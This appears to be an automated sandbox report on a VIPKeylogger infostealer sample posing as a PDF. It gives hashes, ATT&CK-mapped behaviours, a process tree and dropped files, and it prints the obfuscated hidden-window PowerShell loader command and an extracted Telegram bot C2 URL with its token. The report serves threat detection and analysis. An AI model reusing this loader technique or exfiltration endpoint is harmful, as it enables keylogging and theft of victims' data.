vipkeylogger | e5d71d130593a06ff0c8b0ab05d4c6bd448dd6cbd82c9ba62512a9d240620237

General

Target

OC_0069960.pdf.exe
Size

698KB
MD5

1b3d6a5c2478e4ff1fc016b5fcb9b25b
SHA1

52e0a6ec9d17c331b36f48ded9b35ca16aafc10b
SHA256

e5d71d130593a06ff0c8b0ab05d4c6bd448dd6cbd82c9ba62512a9d240620237
SHA512

9dead747fecdc68e002d8089f8437a2e0e729e3a47291f99917b95f1b5119703d44b57c486df79d6d1b083a71936f726e9d75b6719236f9b029f44f218589389
SSDEEP

12288:rLly7CoRIfzzZF5SbvHfDIPRiuqeoJ2n4lvygU2x3kXC3zjh92nedb6HH:rQ7CoKfzzA/DIPRVqtFqg0Oj2nedbc

Score

10^/10

vipkeylogger discovery execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

C2

https://api.telegram.org/bot6497814516:AAHas9Bu_Hsm8fSF5_kPM60KYlhgUBs0vww/sendMessage?chat_id=7220818658

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3040	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2400	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3040	powershell.exe
2400	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3040 set thread context of 2400	3040	powershell.exe	34

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\schenkler.ini	OC_0069960.pdf.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OC_0069960.pdf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
2400	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3040	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	2400	wab.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1972 wrote to memory of 3040	1972	OC_0069960.pdf.exe	30
PID 1972 wrote to memory of 3040	1972	OC_0069960.pdf.exe	30
PID 1972 wrote to memory of 3040	1972	OC_0069960.pdf.exe	30
PID 1972 wrote to memory of 3040	1972	OC_0069960.pdf.exe	30
PID 3040 wrote to memory of 2400	3040	powershell.exe	34
PID 3040 wrote to memory of 2400	3040	powershell.exe	34
PID 3040 wrote to memory of 2400	3040	powershell.exe	34
PID 3040 wrote to memory of 2400	3040	powershell.exe	34
PID 3040 wrote to memory of 2400	3040	powershell.exe	34
PID 3040 wrote to memory of 2400	3040	powershell.exe	34

C:\Users\Admin\AppData\Local\Temp\OC_0069960.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\OC_0069960.pdf.exe"
1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Overtippling=Get-Content 'C:\Users\Admin\AppData\Local\Temp\boilinglike\vaporarium\Salvelsesfuld\Belabored.Pra75';$Grundkursets=$Overtippling.SubString(55723,3);.$Grundkursets($Overtippling)
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3040
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\boilinglike\vaporarium\Salvelsesfuld\Belabored.Pra75

Filesize
54KB

MD5
0f660ce8a5e142821d373faa8690ddac

SHA1
494a1d49b2215d80c81d16964fae5d48eefd621b

SHA256
7078aea1d30bcdb72e107645ac5c63c092babc9999d641893350e118563f2b0c

SHA512
5e1e86144acd14d64b5560431df35b5d344908e079ad61d1c833b6b4fcce0e167b6bb032c9004e6b4bcc8e2cdf8d38c7b862b028186ab815c2a06db95fc0471e

Download Submit
C:\Users\Admin\AppData\Local\Temp\boilinglike\vaporarium\Tjenestemandsansttelsens.Top

Filesize
302KB

MD5
1a1d839f2ba53bd0b021e0e07d227e7a

SHA1
19c0b2cc103d618cb0c943591fd5481371f6d53a

SHA256
9ac1d7abe0b5a6661b9b89a940af42d9248d81837be964a3e80192ad04b41bec

SHA512
db52834cd469feb0438a3b14db92a0cb701210f8b996d7b3f3537d6afb7adcceb72eb66bf2345a37c3f6cf5f97339e0698756d6f93f352dc30664898955d3073

Download Submit
memory/2400-40-0x0000000000E80000-0x0000000000ECA000-memory.dmp

Filesize
296KB

Download
memory/2400-39-0x0000000000E80000-0x0000000001EE2000-memory.dmp

Filesize
16.4MB

Download
memory/2400-38-0x0000000000E80000-0x0000000001EE2000-memory.dmp

Filesize
16.4MB

Download
memory/3040-14-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/3040-8-0x0000000073AD1000-0x0000000073AD2000-memory.dmp

Filesize
4KB

Download
memory/3040-12-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/3040-16-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/3040-17-0x0000000006770000-0x0000000008655000-memory.dmp

Filesize
30.9MB

Download
memory/3040-18-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/3040-11-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/3040-10-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/3040-9-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing